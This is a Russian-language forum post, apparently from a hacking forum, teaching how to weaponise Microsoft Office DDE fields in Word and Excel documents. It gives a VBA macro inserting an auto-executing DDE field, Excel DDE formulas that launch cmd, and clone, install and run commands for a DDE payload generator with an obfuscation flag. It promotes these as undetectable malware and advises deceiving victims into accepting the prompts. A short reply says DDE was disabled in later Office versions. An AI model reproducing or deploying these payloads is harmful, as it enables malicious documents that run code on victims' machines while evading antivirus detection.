Статья DDE attack: doc эксплуатирование

ColorS

Пользователь
Регистрация
06.04.2019
Сообщения
431
Реакции
191
Депозит
0.00
Привет всем! решил написать эту статью на нелегкую для всех тему, а именно малварь в doc. Очень долго думал стоило ли писать статью, ибо на мои статьи набегают эксперты, с аргументами, но без предложений.
DDE очень хорошо сохранился в большинство версий Microsoft Office, как в excel так и word. Внутри продуктов office есть различные места, где выполнение кода принимается через DDE из-за актуальной атаки, однако, она работает только на очень невнимательных и не обладающих интеллектом пользователей, почему? два и более инвайтов делают большие подозрения в глазах зверька. Давайте рассмотрим самый простой метод атаки...
Он заключается что бы вставить код в поля, включая формулы путь включения "Вставка - > Быстрые Детали - > Поле" наша полезная нагрузка содержится в скобках, правдо назвать ее полезной нагрузкой нельзя)).

word-dde-payload.png

Например есть метод с макросами, темная и не нужная тема ну дам пример
Код:
'' Programmatically inserts a new field code into a word document at the current selection index.
''' This is of type "wdFieldDDEAuto" which is a field code which executes Dynamic Data Exchange (DDE)
''' When the document is opened. This includes an example PoC which launches calc.exe
Public Sub FieldCodeFun()
' Payload String
Dim payload As String
payload = """c:\\windows\\system32\\calc.exe"" ""/c calc.exe"""
' Insert our payload as a field code
Selection.Collapse Direction:=wdCollapseEnd
ActiveDocument.Fields.Add Range:=Selection.Range, _
Type:=wdFieldDDEAuto, Text:=payload
End Sub
В excel таким же образом обстоят дела. только структура разная
excel-dde-command.png

Код:
=cmd|'/c calc.exe'!A1
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''
однако у excel есть предупреждение безопасности из за чего не рекомендую использовать в нем.
Автоматизируем процесс
Недавно, а именно год назад, я изучал методы запуска вредоносного кода, и наткнулся на github репозиторий
в чем фишка? фишка в том что dde exploit будет fud из за обфускации и правильной команде, можно создать неплохое вооружение.
Установка (для тех кому лень заходить)
Код:
git clone https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads.git

Код:
pip install -r requirements.txt

Код:
python ddeexcel.py
Использование с обфускацией
Код:
python ddeword.py --obfuscate
первый инвайт будет на обновление, второй/третий на вашу креативность
 
Последнее редактирование:
Сомнительно по поводу чистоты, на каких версиях пашет?
2017.1 DDE отключили и сделали систему безопасности нацеленную на DDE даже на 2019 если ты отключишь безопасность
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх